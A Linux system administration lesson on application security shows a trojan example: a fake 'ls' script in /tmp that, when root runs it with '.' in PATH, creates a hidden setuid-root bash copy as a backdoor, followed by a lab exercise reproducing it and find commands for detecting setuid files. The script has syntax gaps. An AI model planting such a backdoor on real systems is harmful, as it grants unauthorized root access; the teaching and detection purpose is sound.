Lesson 13

Date: 7/3/2017
Application security and Intrusion detection
Linux System Administration

Example of a Trojan

  • Assume, root has path set as follows: PATH=.:$PATH

  • Hacker puts the script in /tmp and gives it name ls

  • When root comes in /tmp and executes ls it creates a back door for the hacker.

  • When a user executes /tmp/.sh -p he becomes root.
  • #!/bin/sh
    # check if I am the root:
    if [ "$who" = "root" ]
    cp /bin/bash .sh
    chmod 4755 .sh
    /bin/rm ls
    /bin/ls $*

  • This trojan can be found with find command:
    find /tmp -type f -perm /u=s,g=s -ls
    find /tmp -type f -perm /6000 -ls
  • Very often, Trojans come with a new software. Verify developers signatures using checksums or GPG/PGP tools.

    Perform the exercise below on smbhost VM that you have deployed in the previous lesson.
    virsh start smbhost
    Figure out the IP address of smbhost:
    grep smbhost /var/lib/libvirt/dnsmasq/default.leases
    Initiate two SSH conections to smbhost from the different terminal windows. For example, the IP address of smbhost is
    Do the same SSH command in the other terminal window.
    While login as user hostadm, create the script, ls, in /tmp, then
    chmod 755 ls
    In the other terminal, become root
    sudo -s
    Modify your path variables by including ".", step into /tmp, and execute command ls:
    export PATH=.:$PATH 
    cd /tmp
    In the other terminal window, where the user is not root, hostadm,
     cd /tmp 
    /tmp/.sh -p 
    then see what happens.
    When you finish with the exercise, DON'T FORGET to remove /tmp/.sh !!!

  • Take me to the Course Website